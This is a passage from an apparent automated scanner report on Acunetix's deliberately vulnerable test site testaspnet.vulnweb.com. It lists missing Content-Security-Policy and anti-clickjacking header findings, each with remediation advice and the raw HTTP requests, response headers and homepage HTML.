style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Instances	31
Solution	Ensure that your web server, application server, load balancer, etc. is configured to set the Content-Security-Policy header, to achieve optimal browser support: "Content-Security-Policy" for Chrome 25+, Firefox 23+ and Safari 7+, "X-Content-Security-Policy" for Firefox 4.0+ and Internet Explorer 10+, and "X-WebKit-CSP" for Chrome 14+ and Safari 6+.
Reference	https://developer.mozilla.org/en-US/docs/Web/Security/CSP/Introducing_Content_Security_Policy https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html http://www.w3.org/TR/CSP/ http://w3c.github.io/webappsec/specs/content-security-policy/csp-specification.dev.html http://www.html5rocks.com/en/tutorials/security/content-security-policy/ http://caniuse.com/#feat=contentsecuritypolicy http://content-security-policy.com/
Tags	OWASP_2021_A05 OWASP_2017_A06
CWE Id	693
WASC Id	15
Plugin Id	10038

Medium	Missing Anti-clickjacking Header
Description	The response does not include either Content-Security-Policy with 'frame-ancestors' directive or X-Frame-Options to protect against 'ClickJacking' attacks.

URL	http://testaspnet.vulnweb.com
Method	GET
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 219 bytes.	GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:14 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/
Method	GET
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 220 bytes.	GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=p2ttr345zecuqfmoxygyermi; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:14 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a 